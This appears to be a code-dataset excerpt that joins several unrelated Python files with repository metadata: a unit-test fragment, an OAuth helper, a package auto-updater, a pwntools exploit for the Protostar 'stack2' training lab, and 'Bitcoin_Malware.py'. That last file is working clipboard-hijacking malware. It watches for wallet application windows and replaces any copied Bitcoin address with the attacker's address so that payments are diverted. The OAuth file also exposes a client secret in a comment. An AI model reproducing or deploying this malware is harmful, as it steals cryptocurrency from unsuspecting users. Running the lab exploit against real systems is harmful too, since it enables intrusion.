self.assertEqual(self.d[self.k], inc(self.v))
if __name__ == "__main__":
t.main()
| 25.320611 | 162 | 0.633203 | 9,639 | 0.968646 | 206 | 0.020701 | 0 | 0 | 0 | 0 | 1,375 | 0.138177 |
a830be9674eca4b0486b3f40d92cbb270322784c | 2,327 | py | Python | Bitcoin_Malware.py | Ismael-Safadi/Bitcoin-Wallet-address-spoofer | 16b92d5538d10a2b14ee1fed441a25bdb33a2e67 | [
"MIT"
]
| 7 | 2019-03-04T14:28:53.000Z | 2022-01-31T12:11:53.000Z | Bitcoin_Malware.py | Ismael-Safadi/Bitcoin-Wallet-address-spoofer | 16b92d5538d10a2b14ee1fed441a25bdb33a2e67 | [
"MIT"
]
| null | null | null | Bitcoin_Malware.py | Ismael-Safadi/Bitcoin-Wallet-address-spoofer | 16b92d5538d10a2b14ee1fed441a25bdb33a2e67 | [
"MIT"
]
| 4 | 2019-03-04T14:29:01.000Z | 2022-01-31T12:11:40.000Z | # Coded By : Ismael Al-safadi
from win32gui import GetWindowText, GetForegroundWindow
from pyperclip import copy
from re import findall
from win32clipboard import OpenClipboard , GetClipboardData , CloseClipboard
from time import sleep
class BitcoinDroper:
"""
class for spoofing Bitcoin Wallet address .
Methods :
check_active_window : for check active window.
check_bitcoin_wallet : This method will check if the copied data right now
is as Bitcoin Wallet address or not.
return_copied_wallet : this function will return the old address .
spoof_wallet : Function for change address to your.
get_old_wallet : Function for getting the old address .
spoofing_done : Function to show if spoofing done or not .
"""
def __init__(self):
# You can add many of bitcoin wallets names into the list
self.list_of_btc = ['blockchain','exodus','coinbase','electrum' , 'bitcoin','bitstamp']
self.destination_address = "Your Bitcoin address wallet"
self.done = False
def check_active_window(self):
window = (GetWindowText(GetForegroundWindow())[0:44])
window = str(window).lower()
if any(ext in window for ext in self.list_of_btc):
return True
else:
return False
def check_bitcoin_wallet(self):
OpenClipboard()
data = GetClipboardData()
CloseClipboard()
l = findall('[a-zA-Z0-9]{34}', data)
if len(l) == 1:
return True
else:
return False
def return_copied_wallet(self):
copy(self.old_wallet)
def spoof_wallet(self):
copy(self.destination_address)
self.done = True
def get_old_wallet(self):
OpenClipboard()
self.old_wallet = GetClipboardData()
CloseClipboard()
def spoofing_done(self):
return self.done
a = BitcoinDroper()
while True:
if a.check_active_window() and a.check_bitcoin_wallet():
if not a.spoofing_done():
a.get_old_wallet()
a.spoof_wallet()
elif a.spoofing_done():
if a.check_bitcoin_wallet() and not a.check_active_window():
a.return_copied_wallet()
sleep(2)
| 31.026667 | 96 | 0.628277 | 1,733 | 0.744736 | 0 | 0 | 0 | 0 | 0 | 0 | 741 | 0.318436 |
a832641c2261a8791df173a07f00c6ea847b04f1 | 504 | py | Python | Exploits/Protostar/stack/stack2.py | SkyBulk/OSCE | 1749add01cfbc80b11055ea2fdbfdfdee1409a3c | [
"BSD-3-Clause"
]
| 80 | 2018-07-12T04:58:02.000Z | 2022-03-18T11:31:49.000Z | Exploits/Protostar/stack/stack2.py | SunWare-shellcoder/OSCE-1 | 1749add01cfbc80b11055ea2fdbfdfdee1409a3c | [
"BSD-3-Clause"
]
| null | null | null | Exploits/Protostar/stack/stack2.py | SunWare-shellcoder/OSCE-1 | 1749add01cfbc80b11055ea2fdbfdfdee1409a3c | [
"BSD-3-Clause"
]
| 43 | 2018-07-12T19:48:15.000Z | 2021-11-01T13:16:25.000Z | #!/usr/bin/env python
# $Id: stack2.py,v 1.0 2018/06/21 23:12:02 dhn Exp $
from pwn import *
level = 2
host = "10.168.142.133"
user = "user"
chal = "stack%i" % level
password = "user"
binary = "/opt/protostar/bin/%s" % chal
shell = ssh(host=host, user=user, password=password)
padding = "A" * 64
addr = p32(0x0d0a0d0a)
payload = padding
payload += addr
r = shell.run("GREENIE=\"%s\" %s" % (payload, binary))
r.recvuntil("you have correctly modified the variable")
r.clean()
log.success("Done!")
| 20.16 | 55 | 0.656746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 204 | 0.404762 |
a8347276bdea4347d1187329f50e22db158c90b3 | 5,096 | py | Python | Stock_Programs/myOauth.py | timwroge/DeepPurple | 3d6f3203938853ede654ef4f88b7451a1ba3999e | [
"Apache-2.0"
]
| 4 | 2020-02-13T18:57:41.000Z | 2020-08-03T21:08:26.000Z | Stock_Programs/myOauth.py | timwroge/DeepPurple | 3d6f3203938853ede654ef4f88b7451a1ba3999e | [
"Apache-2.0"
]
| null | null | null | Stock_Programs/myOauth.py | timwroge/DeepPurple | 3d6f3203938853ede654ef4f88b7451a1ba3999e | [
"Apache-2.0"
]
| 1 | 2021-06-14T13:42:39.000Z | 2021-06-14T13:42:39.000Z | import urllib.parse, urllib.request,json
import time
import hmac, hashlib,random,base64
#yahoo stuff
#client ID dj0yJmk9S3owYWNNcm1jS3VIJmQ9WVdrOU1HMUZiMHh5TjJNbWNHbzlNQS0tJnM9Y29uc3VtZXJzZWNyZXQmeD0xOQ--
#client secret ID fcde44eb1bf2a7ff474b9fd861a6fcf33be56d3f
def setConsumerCreds(cons_key,cons_secret):
global consumerKey
global consumerSecret
consumerKey = cons_key
consumerSecret = cons_secret
def set_access_token(key,secret):
global accessToken
global accessTokenSecret
accessToken = key
accessTokenSecret = secret
def get_base_string(resourceUrl, values,method="POST"):
baseString = method+"&"+url_encode(resourceUrl) + "&"
sortedKeys = sorted(values.keys())
for i in range(len(sortedKeys)):
baseString += url_encode(sortedKEys[i] + "=") + url_encode(url_encode(values[sortedKeys[i]]))
if i < len(sortedKeys) - 1:
baseString += url_encode("&")
return baseString
def add_oauth_parameters(parameters, addAccessToken = True):
parameters["oauth_consumer_key"] = consumerKey
if (addAccessToken):
parameters["oauth_token"] = accessToken
parameters["oauth_version"] = "1.0"
parameters["oauth_nonce"] = str(get_nonce())
parameters["oauth_timestamp"] = str(get_timestamp())
parameters["oauth_signature_method"]= "HMAC-SHA1"
def get_nonce():
return random.randint(1,999999999)
def get_timestamp():
return int(time.time())
def get_signature(signingKey,stringToHash):
hmacAlg = hmac.HMAC(signingKey,stringToHash,hashlib.sha1)
return base64.b64encode(hmacAlg.digest())
def url_encode(data):
return urllib.parse.quote(data,"")
def build_oauth_headers(parameters):
header = "OAuth "
sortedKeys = sorted(parameters.keys())
for i in range(len(sortedKeys)):
header = header+ url_encode(sortedKeys[i]) + "=\"" + url_encode(parameters[sortedKeys[i]]) + "\""
if i < len(sortedKeys) - 1:
header = header + ","
return header
##### ACTUAL FUNCTIONS
def get_authorization_url(resourceUrl,endpointUrl,callbackUrl):
oauthParameters = {}
add_oauth_parameters(oauthParameters, False)
oauthParameters["oauth_callback"] = callbackUrl
baseString = get_base_string(resourceUrl,OauthParameters)
signingKey = consumerSecret + "&"
oauthParameters["oauth_signature"] = get_signature(signingKey,baseString)
headers = build_oauth_headers(oauthParameters)
httpRequest = urllib.request.Request(resourceUrl)
httpRequest.add_header("Authorization",headers)
try:
httpResponse = urllib.request.urlopen(httpRequest)
except urllib.request.HTTPError as e:
return "Response: %s" % e.read()
responseData = httpResponse.read()
responseParameters = responseData.split("&")
for string in responseParameters:
if string.find("oauth_token_secret") -1: requestTokenSecret = string.split("=")[1]
elif string.find("oauth_token") -1: requestToken = string.split("=")[1]
return endpointUrl+"?oauth_token="+requestToken
def get_access_token(resourceUrl, requestTok, requestTokSecret, oauth_verifier):
global requestToken,requestTokenSecret,accessToken,accessTokenSecret
requestToken = requestTok
requestTokenSecret = requestTokSecret
oauthParmeters = {"oauth_verfier" : oauth_verifier,"oauth_token":requestToken}
add_oauth_paremeters(oauthParameters,False)
baseString = get_base_string(resourceUrl,oauthParameters)
signingKey = consumerSecret + "&" + requestTokenSecret
oauthParameters["oauth_signature"] = get_signature(signingKey,baseString)
header = build_oauth_headers(oauthParameters)
httpRquest = urllib.request.Request(resourceUrl)
httpRequest.add_header("Authorization",header)
httpResponse = urllib.request.urlopen(httpRequest)
responseParameters = httpResponse.read().split("&")
for string in responseParameters:
if string.find("oauth_token_secret")-1:
accessTokenSecret = string.split("=")[1]
elif string.find("oauth_token")-1:
accessToken = string.split("=")[1]
def get_api_response(resourceUrl, method="POST", parameters=None):
    # Step 3: sign and send a request against a protected resource.
    if parameters is None:  # avoid the shared-mutable-default pitfall
        parameters = {}
    add_oauth_parameters(parameters)
    baseString = get_base_string(resourceUrl, parameters, method)
    signingKey = consumerSecret + "&" + accessTokenSecret
    parameters["oauth_signature"] = get_signature(signingKey, baseString)
    # Split the oauth_* parameters (sent in the Authorization header) from
    # the application parameters (sent in the request body).
    bodyParameters = {}
    for key in sorted(parameters.keys()):
        if key.find("oauth_") == -1:
            bodyParameters[key] = parameters.pop(key)
    header = build_oauth_headers(parameters)
    httpRequest = urllib.request.Request(resourceUrl, urllib.parse.urlencode(bodyParameters).encode("utf-8"))
    httpRequest.add_header("Authorization", header)
    httpResponse = urllib.request.urlopen(httpRequest)
    return httpResponse.read()
def yqlQuery(query):
    # YQL takes the statement in the q parameter; format=json switches the
    # response from the default XML to JSON so json.loads() can parse it.
    baseUrl = "https://query.yahooapis.com/v1/public/yql?q="
    searchUrl = baseUrl + urllib.parse.quote(query) + "&format=json"
    result = urllib.request.urlopen(searchUrl).read()
    data = json.loads(result.decode("utf-8"))
    return data["query"]["results"]
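# Usage sketch: exercises the pure signing helpers offline, end to end, so the
# pipeline can be checked without network access. The URL, consumer key and
# secret below are hypothetical placeholders, so the printed header is only
# illustrative; a real provider also needs the three-legged flow noted at the
# end.
if __name__ == "__main__":
    demoParams = {"oauth_consumer_key": "demo-key",  # hypothetical credential
                  "oauth_nonce": str(get_nonce()),
                  "oauth_timestamp": str(get_timestamp()),
                  "oauth_signature_method": "HMAC-SHA1",
                  "oauth_version": "1.0"}
    base = get_base_string("https://api.example.com/resource", demoParams)
    demoParams["oauth_signature"] = get_signature("demo-secret&", base)  # consumer secret + "&"
    print(build_oauth_headers(demoParams))
    # Against a real provider the full flow would be:
    #   1. get_authorization_url(requestTokenUrl, authorizeUrl, callbackUrl)
    #   2. get_access_token(accessTokenUrl, requestToken, requestTokenSecret, verifier)
    #   3. get_api_response(resourceUrl, parameters={"status": "hello"})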
| 41.770492 | 116 | 0.724882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 708 | 0.138932 |
a8347a798c6edcafbe98def909244e3a366c1264 | 5,246 | py | Python | IOController/src/UpdateManager.py | MicrosoftDX/liquidintel | 8c3f840f88ca3515cc812078a620e2a845978177 | ["MIT"] | 9 | 2017-05-27T20:42:46.000Z | 2020-11-12T21:03:28.000Z | IOController/src/UpdateManager.py | MicrosoftDX/liquidintel | 8c3f840f88ca3515cc812078a620e2a845978177 | ["MIT"] | 30 | 2017-02-16T19:43:18.000Z | 2018-01-17T21:17:01.000Z | IOController/src/UpdateManager.py | MicrosoftDX/liquidintel | 8c3f840f88ca3515cc812078a620e2a845978177 | ["MIT"] | 6 | 2017-02-24T03:40:04.000Z | 2020-11-22T20:29:11.000Z |
import os, sys, logging, threading, tempfile, shutil, tarfile, inspect
from ConfigParser import RawConfigParser
import requests
from DXLiquidIntelApi import DXLiquidIntelApi
log = logging.getLogger(__name__)
class UpdateManager:
def __init__(self, liquidApi, packageType, checkUnpublished, packageCheckInterval, configuredInstallDir):
self._liquidApi = liquidApi
# We assume the last segment in the installation directory is the version label
(self._baseInstallDir, self._semanticVersion) = os.path.split(self._getInstallDir(configuredInstallDir))
self._packageType = packageType
self._checkUnpublished = checkUnpublished
self._packageCheckInterval = packageCheckInterval
self._restartRequired = False
# Initial check is synchronous
self.checkForNewVersion()
    def __enter__(self):
        # Return self so "with UpdateManager(...) as updates:" binds the instance.
        return self
def __exit__(self, type, value, traceback):
if self._timer:
self._timer.cancel()
def checkForNewVersion(self):
self._timer = None
restartTimer = True
log.info('Checking for newer version from package manager api')
packages = self._liquidApi.getInstallationPackages(self._semanticVersion, self._packageType.value, self._checkUnpublished.value)
if len(packages) > 0:
log.info('New installation packages detected: %s', packages)
installPackage = packages[-1]
newInstallDir = os.path.join(self._baseInstallDir, installPackage["Version"])
log.info('Installing package version: %s at: %s. Download location: %s. %s', installPackage["Version"], newInstallDir, installPackage["PackageUri"], installPackage["Description"])
try:
# Download the package
downloadReq = requests.get(installPackage["PackageUri"], stream = True)
downloadReq.raise_for_status()
# Create a new installation directory, using the version label
if os.path.exists(newInstallDir):
log.warning('Installation directory %s already exists - this will overwrite existing contents', newInstallDir)
else:
os.makedirs(newInstallDir)
# Assume package content is .tar.gz - unfortunately we can't stream the response directly into the tar extractor as the
# HTTP response stream doesn't support seek()
with tempfile.NamedTemporaryFile(prefix="package-tarball-", suffix=".tar.gz", delete=False) as fd:
shutil.copyfileobj(downloadReq.raw, fd)
fd.seek(0)
tar = tarfile.open(fileobj=fd)
tar.extractall(newInstallDir)
# Point the symlink to the new directory
if sys.platform != 'win32':
currentSymlink = os.path.join(self._baseInstallDir, 'current')
if os.path.exists(currentSymlink):
os.remove(currentSymlink)
os.symlink(newInstallDir, currentSymlink)
# Check if this version has any configuration that we need to apply locally
if 'Configuration' in installPackage and installPackage['Configuration']:
configFile = os.path.join(newInstallDir, 'IOController.cfg')
log.info('Writing version-specific configuration to: %s', configFile)
config = RawConfigParser()
                    # Convert from JSON form to .INI form by interpreting all object values as sections
                    # and all others as primitive values in the parent section
                    # Top level should be section names with values
for (section, values) in installPackage['Configuration'].items():
if not isinstance(values, dict):
                            log.warning('Package configuration for keg/section: %s does not contain an object. Non-objects are not supported.', section)
else:
config.add_section(section)
for (setting, value) in values.items():
config.set(section, setting, value)
with open(configFile, 'w') as fd:
config.write(fd)
self._restartRequired = True
# No need to restart the timer as we're bailing on the next main loop iteration
restartTimer = False
except:
log.warning('Failed to download installation package. Will retry on next interval.', exc_info=1)
if restartTimer:
self._timer = threading.Timer(self._packageCheckInterval.value, self.checkForNewVersion)
self._timer.start()
@property
def restartRequired(self):
return self._restartRequired
@property
def semanticVersion(self):
return self._semanticVersion
def _getInstallDir(self, configuredInstallDir):
if configuredInstallDir or sys.platform == 'win32':
return configuredInstallDir
return os.path.dirname(os.path.realpath(inspect.getabsfile(UpdateManager)))
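# Usage sketch: how a host service might drive UpdateManager from its main
# loop. The _Setting shim stands in for the configuration wrapper the real
# service passes (anything exposing a .value attribute); the package type
# 'tessel' is a hypothetical value, and the DXLiquidIntelApi constructor
# arguments are omitted because its signature lives in DXLiquidIntelApi.py.
#
#     import collections, time
#     _Setting = collections.namedtuple('_Setting', ['value'])
#     api = DXLiquidIntelApi(...)  # see DXLiquidIntelApi.py for arguments
#     with UpdateManager(api, _Setting('tessel'), _Setting(False),
#                        _Setting(3600), None) as updates:
#         while not updates.restartRequired:
#             time.sleep(5)        # normal service work happens here
#     # Exiting once restartRequired is set lets a process supervisor
#     # relaunch the service, which then runs the newly installed version.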
| 51.940594 | 191 | 0.62276 | 5,025 | 0.957873 | 0 | 0 | 154 | 0.029356 | 0 | 0 | 1,372 | 0.261533 |